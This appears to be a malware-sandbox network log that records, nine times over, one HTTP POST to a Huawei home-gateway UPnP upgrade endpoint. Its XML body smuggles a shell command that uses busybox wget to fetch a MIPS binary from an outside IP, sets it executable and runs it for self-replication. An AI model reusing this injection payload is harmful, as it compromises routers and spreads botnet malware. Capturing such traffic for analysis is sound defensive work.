      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 31 34 39 2e 32 34 31 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 46 61 6e 74 61 7a 79 2f 46 61 6e 74 61 7a 79 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.149.241.90 -l /tmp/.oxy -r /Fantazy/Fantazy.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy Huawei.Selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
